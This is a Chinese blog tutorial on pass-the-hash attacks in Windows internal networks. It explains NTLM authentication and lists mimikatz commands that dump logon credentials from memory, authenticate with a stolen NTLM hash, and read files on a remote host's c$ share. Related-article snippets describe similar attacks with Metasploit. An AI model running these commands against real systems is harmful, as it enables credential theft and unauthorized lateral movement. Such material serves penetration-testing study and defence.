内网渗透之哈希传递

最新推荐文章于 2023-07-25 15:04:38 发布
最新推荐文章于 2023-07-25 15:04:38 发布
阅读量309 收藏 1
点赞数 1
文章标签: 哈希算法 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/agrilly/article/details/131542992
版权

目录

概念与原理

NTLM:

哈希登录过程:

环境

概念与原理

哈西传递是通过哈希值验证用户密码,不通过明文密码登录。哈希是一种加密手法,根据哈希值无法推算出原文,常见的哈希加密函数有MD5、SHA1、SHA256。

哈希传递使用NTLM认证,攻击者在截获hash后不需要破解为明文再登录。因此在内网渗透时,攻击者获取到哈希值就可以使用哈希攻击获取到用户主机权限。

哈希传递适用于域中密码相同的主机,通过相同密码获取一台主机权限后可以拿下相同密码主机的权限。因为只有密码相同经过NTLM后的hash密文才相同。

NTLM:

明文密码--->16进制编码--->unicode编码--->MD4--->hash密文

哈希登录过程:

1.用户发送用户名user登录,不发送密码

2.服务器收到后,匹配有无该用户名若无登录失败,若有生成challenge,将本地存储的密码经过ntml加密生成hash,用hash加密challenge生成密文1存储在本地服务器,并将challenge发送给用户。challenge是随机生成的过一段时间改变一次。

3.用户使用ntml加密密码生成hash,用户收到challenge后,用hash加密challenge生成密文2,将密文2发送给服务器

4.服务器验证密文2是否与密文1相同,若相同则该用户登录成功。

环境

使用mimikatz

进入mimikatz路径

1. 首先打开cmd(注:需以管理员权限运行),使用提权命令,提权至system权限:

privilege::debug                            提升权限到system权限

 

2.获取ntml值:

sekurlsa::logonpasswords                      获取内存中保存的登录信息即用户的ntml值

 

3.尝试攻击:

sekurlsa::pth/user:x/domain:x/ntlm:e10adc3949ba59abbe56e057f20f883e      user为要攻击主机名,domain为所在域,ntlm为明文密码通过hash加密后的密文,弹出新窗口

4.成功后可以查看该主机文件:

dir \\x.x.x.x\c$     dir查看ip为x.x.x.x,c盘下的文件

 

命令代码汇总:

privilege::debug                            提升权限到system权限(注:需以管理员权限运行)
sekurlsa::logonpasswords          			获取内存中保存的登录信息即用户的ntml值
sekurlsa::pth/user:x/domain:x.com/ntlm:e10adc3949ba59abbe56e057f20f883e		user为要攻击主机名,domain为所在域,ntlm为明文密码通过hash加密后的密文,弹出新窗口
dir \\x.x.x.x\c$             dir查看ip为x.x.x.x,c盘下的文件
type \\x.x.x.x\c$\1.php	     看ip下c盘里1.php文件
agrilly
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
哈希传递攻击(Pass-the-Hash,PtH)
谢公子的博客
01-11 5191
目录 哈希传递攻击 MSF进行哈希传递攻击PtH(工作组) MSF进行哈希传递攻击PtH(域) mimikatz进行哈希传递攻击PtH(工作组) mimikatz进行哈希传递攻击PtH(域) 使用AES进行哈希传递攻击(PTK,Pass The Key) 更新KB2871997补丁产生的影响 哈希传递攻击 哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们...
内网渗透——哈希传递
来日可期的博客
10-09 1120
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
内网横传之哈希传递(Pass The Hash)
11-25 7161
本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题
哈希传递内网渗透
认真走好每一小步
07-25 327
哈希传递只有在相同密码的情况下有用!!!
哈希传递:保护数据完整性和验证身份的关键技术
qq_45758325的博客
07-24 523
哈希传递:保护数据完整性和验证身份的关键技术
操作系统之哈希表Linux内核应用浅析
01-27
也叫哈希表)。是依据关键码值(Key value)而直接进行訪问的数据结构。也就是说,它通过把关键码值映射到表中一个位置来訪问记录。以加快查找的速度。这个映射函数叫做散列函数。存放记录的数组叫做散列表。散列函数...
哈希表之班级同学
01-29
班级同学名字通过哈希表实现,班级同学名字通过哈希表实现,班级同学名字通过哈希表实现,
c语言面试题之哈希表赎金信.zip
最新发布
03-29
c语言面试题 c语言面试题之哈希表赎金信
c语言面试题之哈希表分糖果.zip
03-29
c语言面试题 c语言面试题之哈希表分糖果
个人简单笔记,后渗透学习之Passing the Hash(哈希传递
来到了学渣的博客
02-25 619
Passing the Hash Hash基础知识 Window系统下的Hash密码格式为: 用户名称:RID:LM-Hash值:NT-Hash值 获取Hash值 我自己暂时所知道的三种方法 Hashdump Run post/windows/gather/smart_hashdump use post/windows/gather/hashdump 前提是要获得shell,获shell方法在...
后渗透模块之Hash传递
weixin_45007073的博客
01-26 374
前言 我们有时候获取到了用户的hash值但是不能正确地解出密码,这是因为hash解码是需要碰撞的,成功的几率也不是特别高,因此我们使用另一种方式,直接使用hash值登录目标系统。 利用过程 前提是我们已经获取到了目标系统的SYSTEM权限,然后我们利用smb下的psexec这个模块 use exploit/windows/smb/psexec set rhosts 192.168.75.139 set smbuser pyh(普通管理员账户) set smbpass aad3b435b51404eeaad
正确传递hash引用
ace_fei的专栏
06-10 1207
    大家应该知道哈希引用需要初始化,这我就不多说了。    我就主要分享下传入哈希引用有两种方式    #!/usr/bin/perluse Data::Dumper;sub foo { my $h = shift; $h->{hello} = World!;}my $a;my $b = {};foo($a); print Dumper(
哈希传递攻击(Pass-the-Hash)
whoim_i的博客
12-25 9986
目录使用msf进行哈希传递攻击使用mimikatz进行哈希传递攻击PTH(工作组) 使用msf进行哈希传递攻击 有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口(文件共享)打开着。我们则可以利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(注意:只能是adminis...
内网渗透-Hash传递攻击
lza20001103的博客
10-01 1567
Hash传递攻击 文章目录Hash传递攻击前言psexec模块 前言 今天给大家讲解一个知识点,Hash传递攻击,它是在不知道明文密码,只知道hash值的时候进行攻击的一种手段,会返回一个会话,且是system权限,但会遇到uac的问题,我们只要关闭uac就可以了。 psexec模块 利用的前提是必须开放445端口 首先,我们需要获得用户的hash值 在kali中,不知道为什么hash值获取不了,我们cs上线来获取hash值 Administrator的hash值如下: aad3b435b51404eea
内网横向移动之票据传递哈希传递
qq_52074678的博客
06-21 375
内网横向移动
域渗透之哈希传递攻击及其原理
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-09 1897
哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。在学习哈希传递攻击之前我们先来了解一下其背后的Windows 底层协议和原理。
PtH(hash传递攻击)原理探秘
weixin_30500473的博客
08-10 3573
背景知识 Windows 横向渗透的两种方式 1、hash传递攻击,通过传递NTLM-Hash,登录机器,简称PtH; 2、ticket传递攻击,通过传递kerberos的ticket,登录机器,简称PtT; 以上两种都是常见的域内或者叫做内网渗透的横向移动的常见手段。 NTLM协议机制简述 在hash传递攻击中。传递的就是NTLMhash值,这里我们就要简述一下NTLM的过程。 NT...
内网渗透 - 哈希传递攻击
LuckySec
06-06 2325
内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击,攻击者不需要花时间破解密码哈希值来获取明文密码
Android中如何在Activity中传递哈希
05-12
在Android中,你可以使用Bundle类来传递哈希表。Bundle是一种键值对的数据结构,它可以用来传递数据。你可以将哈希表中的键值对存储到Bundle中,然后将Bundle传递给另一个Activity。下面是一个示例代码: 在发送Activity中: ``` HashMap<String, String> hashMap = new HashMap<String, String>(); hashMap.put("key1", "value1"); hashMap.put("key2", "value2"); Intent intent = new Intent(SendingActivity.this, ReceivingActivity.class); Bundle bundle = new Bundle(); bundle.putSerializable("hashMap", hashMap); intent.putExtras(bundle); startActivity(intent); ``` 在接收Activity中: ``` HashMap<String, String> hashMap = (HashMap<String, String>) getIntent().getSerializableExtra("hashMap"); ``` 注意:哈希表必须实现Serializable接口才能被存储到Bundle中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值